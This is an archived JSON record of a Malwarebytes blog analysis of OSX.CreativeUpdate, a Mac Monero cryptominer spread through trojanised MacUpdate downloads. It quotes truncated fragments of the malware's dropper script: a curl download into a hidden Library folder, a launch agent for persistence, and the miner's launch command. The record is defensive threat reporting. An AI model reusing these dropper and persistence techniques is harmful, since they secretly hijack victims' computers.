{
	"id": "b4493c5a-f2f6-4e95-9462-109966d31a7c",
	"created_at": "2026-04-06T01:30:54.598288Z",
	"updated_at": "2026-04-10T03:21:00.537322Z",
	"deleted_at": null,
	"sha1_hash": "c0fe6bb0fdcda26a8532095f80df13e917563cd5",
	"title": "New Mac cryptominer distributed via a MacUpdate hack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 328675,
	"plain_text": "New Mac cryptominer distributed via a MacUpdate hack\r\nBy Thomas Reed\r\nPublished: 2018-02-01 · Archived: 2026-04-06 00:49:28 UTC\r\nEarly this morning, security researcher Arnaud Abbati of SentinelOne tweeted about new Mac malware being\r\ndistributed via MacUpdate. This malware, which Abbati has named OSX.CreativeUpdate, is a new cryptocurrency\r\nminer, designed to sit in the background and use your computer’s CPU to mine the Monero currency.\r\nThe malware was spread via hack of the MacUpdate site, which was distributing maliciously-modified copies of\r\nthe Firefox, OnyX, and Deeper applications. According to a statement posted in the comments for each of the\r\naffected apps on the MacUpdate website, this happened sometime on February 1.\r\nhttps://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/\r\nPage 1 of 4\n\nBoth OnyX and Deeper are products made by Titanium Software (titanium-software.fr), but the site was changed\r\nmaliciously to point to download URLs at titaniumsoftware.org, a domain first registered on January 23, and\r\nwhose ownership is obscured. The fake Firefox app was distributed from download-installer.cdn-mozilla.net.\r\n(Notice the domain ends in cdn-mozilla.net, which is definitely not the same as mozilla.net. This is a common\r\nscammer trick to make you think it’s coming from a legitimate site.)\r\nThe downloaded files are .dmg (disk image) files, and they look pretty convincing. In each case, the user is asked\r\nto drag the app into the Applications folder, as would the original, non-malicious .dmg files for those apps.\r\nThe applications themselves were, as Abbati indicated in his tweet, created by Platypus, a developer tool that\r\nmakes full macOS applications from a variety of scripts, such as shell or Python scripts. This means the creation\r\nof these applications had a low bar for entry.\r\nOnce the application has been installed, when the user opens it, it will download and install the payload\r\nfrom public.adobecc.com (a legitimate site owned by Adobe). Then, it attempts to open a copy of the original app\r\n(referred to as a decoy app, because it is used to trick the user into thinking nothing’s wrong), which is included\r\ninside the malicious app.\r\nHowever, this isn’t always successful. For example, the malicious OnyX app will run on Mac OS X 10.7 and up,\r\nbut the decoy OnyX app requires macOS 10.13. This means that on any system between 10.7 and 10.12, the\r\nmalware will run, but the decoy app won’t open to cover up the fact that something malicious is going on. In the\r\ncase of the Deeper app, the hackers got even sloppier, including an OnyX app instead of a Deeper app as the\r\ndecoy by mistake, making it fail similarly but for a more laughable reason.\r\nhttps://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/\r\nPage 2 of 4\n\nThe “script” file inside the app takes care of opening the decoy app, and then downloading and installing the\r\nmalware.\r\nopen Deeper.app if [ -f ~/Library/mdworker/mdworker ]; then killall Deeperd else nohup curl -o ~/Lib\r\nFor those who can’t read shell scripts, this code first attempts to open the decoy Deeper.app, which will fail since\r\nthe wrong decoy was included by mistake. Next, if the malware is already installed, the malicious dropper process\r\nis killed, since installation is not necessary.\r\nIf the malware is not installed, it will download the malware and unzip it into the user’s Library folder, which is\r\nhidden in macOS by default, so most users wouldn’t even know anything had been added there. It also installs a\r\nmalicious launch agent file named MacOSupdate.plist, which recurrently runs another script.\r\n Label MacOSupdate ProgramArguments sh -c launchctl unload -w ~/Library/LaunchAgents/MacOS\r\nWhen this launch agent runs, it downloads a new MacOS.plist file and installs it. Before doing so, it will remove\r\nthe previous MacOS.plist file, presumably so it can be updated with new code. The version of this MacOS.plist\r\nfile that we obtained did the real work.\r\nsh -c~/Library/mdworker/sysmdworker -user walker18@protonmail.ch -xmr\r\nThis loads a malicious sysmdworker process, passing in a couple arguments, one of which is an email address.\r\nThat sysmdworker process will then do the work of mining the Monero cryptocurrency, using a command-line\r\ntool called minergate-cli, and periodically connecting to minergate.com, passing in the above email address as the\r\nlogin.\r\nThere are multiple takeaways from this. First and foremost, never download software from any kind of “download\r\naggregation” site (a site that acts like an unofficial Mac App Store to let you browse for software). Such sites have\r\na long history of issues. In the case of MacUpdate, back in 2015 they were modifying other people’s software,\r\nwrapping it in their own adware-laden installer. This is no longer happening, but in 2016, MacUpdate was\r\nsimilarly used to distribute the OSX.Eleanor malware.\r\nInstead, always download software directly from the developer’s site or from the Mac App Store. These are not\r\nguarantees, and can still get you infected with malware, adware, or scam software. But your odds are better. Be\r\nsure to check around to make sure the software is legitimate before downloading, but do not give full credence to\r\nratings or reviews on third-party sites or the Mac App Store, as those can be faked.\r\nSecond, if you have downloaded a new application and it seems not to be functioning as expected—such as not\r\nopening at all when you double-click it—be suspicious. Consider scanning your computer with security software.\r\nMalwarebytes for Mac will detect this malware as OSX.CreativeUpdater.\r\nFinally, be aware that the old adage that “Macs don’t get viruses,” which has never been true, is proven to be\r\nincreasingly false. This is the third piece of Mac malware so far this year, following OSX.MaMi and\r\nhttps://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/\r\nPage 3 of 4\n\nOSX.CrossRAT. That doesn’t even consider the wide variety of adware and junk software out there. Do not let\r\nyourself believe that Macs don’t get infected, as that will make you more vulnerable.\r\nAbout the author\r\nHad a Mac before it was cool to have Macs. Self-trained Apple security expert. Amateur photographer.\r\nSource: https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/\r\nhttps://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/"
	],
	"report_names": [
		"new-mac-cryptominer-distributed-via-a-macupdate-hack"
	],
	"threat_actors": [],
	"ts_created_at": 1775439054,
	"ts_updated_at": 1775791260,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c0fe6bb0fdcda26a8532095f80df13e917563cd5.pdf",
		"text": "https://archive.orkl.eu/c0fe6bb0fdcda26a8532095f80df13e917563cd5.txt",
		"img": "https://archive.orkl.eu/c0fe6bb0fdcda26a8532095f80df13e917563cd5.jpg"
	}
}